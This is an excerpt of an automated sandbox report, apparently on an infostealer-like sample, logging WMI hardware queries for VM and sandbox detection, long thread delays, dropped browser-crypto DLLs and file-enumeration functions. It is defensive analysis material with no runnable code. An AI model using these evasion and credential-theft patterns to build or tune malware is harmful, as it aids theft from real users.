Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 16C0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3260000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 14800330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 14819DD0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: CB0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2880000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 25D0000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 3674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 5771
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 2368
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 7407
Source: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe	Window / User API: threadDelayed 766
Source: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe	Window / User API: threadDelayed 9231

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-39277

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5g0.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qbji	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5g0.2\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	API coverage: 4.2 %
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	API coverage: 1.8 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7700	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7700	Thread sleep time: -300000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -56219s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7700	Thread sleep time: -59888s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -38200s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7700	Thread sleep time: -59771s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -54299s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7700	Thread sleep time: -59655s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -43900s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -54649s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -39758s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -40317s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -41297s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -56386s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -32279s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -48919s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -37529s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -56922s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -38379s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -47683s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -36542s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -35586s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -52642s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -59168s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -51721s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8052	Thread sleep time: -420000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -36227s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -42894s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8044	Thread sleep time: -3000000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -47561s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -53322s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -55861s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -99250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -30079s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -41323s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -31260s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -30572s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -49395s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -37322s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -48478s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -46280s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -42862s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -51832s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -56848s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -53644s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -50688s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -53924s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -57391s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7424	Thread sleep time: -41406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7868	Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7872	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe TID: 7556	Thread sleep count: 766 > 30
Source: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe TID: 7556	Thread sleep time: -544626s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe TID: 7556	Thread sleep count: 9231 > 30
Source: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe TID: 7556	Thread sleep time: -6563241s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_0040D1C0 GetDateFormatA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_004015C0 EntryPoint,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_6C86261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	2_2_6C86261E

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Code function: 1_2_00401120 GetSystemInfo,ExitProcess,

1_2_00401120

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59771
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54299
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59655
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54649
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56386
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48919
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37529
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47683
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36542
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35586
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52642
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51721
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42894
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55861
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30079
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41323
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49395
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51832
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53644
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57391
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41406
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File opened: C:\Users\user\AppData\Local\Temp\u5g0.2	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File opened: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Jump to behavior

Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: u5g0.3.exe, 00000005.00000003.2130032732.0000000000C78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Core
Source: cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: QEMU_HARDU
Source: R0hb7jyBcv.exe, 00000000.00000003.1801742054.00000000026CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Full
Source: cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Core
Source: R0hb7jyBcv.exe, 00000000.00000002.1965217585.000000000094B000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3001938281.000001481B07F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
